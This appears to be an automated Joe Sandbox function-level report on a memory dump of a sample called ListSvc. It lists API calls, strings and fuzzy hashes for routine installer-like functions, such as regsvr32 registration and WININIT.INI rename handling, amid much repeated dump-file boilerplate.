Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
Opcode Fuzzy Hash: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755

Uniqueness

Uniqueness Score: -1.00%

Function 00624BA8, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6

Strings

Spawning 64-bit RegSvr32: , xrefs: 00624C41
regsvr32.exe", xrefs: 00624BF7
/u, xrefs: 00624C12
D, xrefs: 00624C7C
/s ", xrefs: 00624C1F
0x%x, xrefs: 00624CE9
CreateProcess, xrefs: 00624CB8
Spawning 32-bit RegSvr32: , xrefs: 00624C5B

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004062CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336

Strings

<T@, xrefs: 00406300, 0040630B

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite
String ID: <T@
API String ID: 3320372497-2050694182
Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E

Uniqueness

Uniqueness Score: -1.00%

Function 00405D88, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99

Uniqueness

Uniqueness Score: -1.00%

Function 005B8390, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 005B83B6
IsWindowUnicode.USER32(00000000), ref: 005B83F9
SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
Opcode Fuzzy Hash: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765

Uniqueness

Uniqueness Score: -1.00%

Function 00405F80, Relevance: 10.9, APIs: 7, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88

Uniqueness

Uniqueness Score: -1.00%

Function 006158C4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 239windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B

Strings

,hm, xrefs: 00615AA9, 00615AF3
Cannot evaluate variable because [Code] isn't running yet, xrefs: 00615AB3

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: MessagePostWindow$ForegroundProc
String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
API String ID: 602442252-4088602279
Opcode ID: 2bb3247fdb15e1dc09ebdb3d21175550fc0efe1a06f4ab558686e93eab2b52db
Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
Opcode Fuzzy Hash: 2bb3247fdb15e1dc09ebdb3d21175550fc0efe1a06f4ab558686e93eab2b52db
Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0060D8B0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996

Strings

[rename], xrefs: 0060D9FA, 0060DA36
WININIT.INI, xrefs: 0060D944
.tmp, xrefs: 0060D952
NUL, xrefs: 0060DA59
MoveFileEx, xrefs: 0060DBA0

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
API String ID: 390214022-3304407042
Opcode ID: 8acf262c293dccebf8fb0b98e1716e204ebc77ac4caf48964dd87ce58af5a374
Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
Opcode Fuzzy Hash: 8acf262c293dccebf8fb0b98e1716e204ebc77ac4caf48964dd87ce58af5a374
Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00408E18, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB

GetTickCount.KERNEL32 ref: 00408E4F
GetTickCount.KERNEL32 ref: 00408E67
GetCurrentThreadId.KERNEL32 ref: 00408E96
GetTickCount.KERNEL32 ref: 00408EC1
GetTickCount.KERNEL32 ref: 00408EF8
GetTickCount.KERNEL32 ref: 00408F22
GetCurrentThreadId.KERNEL32 ref: 00408F92

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CountTick$CurrentThread
String ID:
API String ID: 3968769311-0
Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A

Uniqueness

Uniqueness Score: -1.00%

Function 005B85F0, Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 005B8604
IsWindowUnicode.USER32 ref: 005B8618
PeekMessageW.USER32 ref: 005B863B
PeekMessageA.USER32 ref: 005B8651
TranslateMessage.USER32 ref: 005B86D6
DispatchMessageW.USER32 ref: 005B86E3
DispatchMessageA.USER32 ref: 005B86EB

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
Opcode Fuzzy Hash: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E

Uniqueness

Uniqueness Score: -1.00%

Function 005C92C8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 005C92F7
GetFocus.USER32 ref: 005C92FF
RegisterClassW.USER32 ref: 005C9320
ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF

Strings

TWindowDisabler-Window, xrefs: 005C9357, 005C93A0

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FocusWindow$ActiveClassRegisterShow
String ID: TWindowDisabler-Window
API String ID: 495420250-1824977358
Opcode ID: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
Opcode Fuzzy Hash: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 006A5F04, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
CloseHandle.KERNEL32(00000000), ref: 006A5F91

Strings

kernel32.dll, xrefs: 006A5F2B
GetFinalPathNameByHandleW, xrefs: 006A5F26

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandle$AttributesCloseCreateModule
String ID: GetFinalPathNameByHandleW$kernel32.dll
API String ID: 791737717-340263132
Opcode ID: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
Opcode Fuzzy Hash: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408BB4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB

Strings

@, xrefs: 00408C69
kernel32.dll, xrefs: 00408BC4
GetLogicalProcessorInformation, xrefs: 00408BBF

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
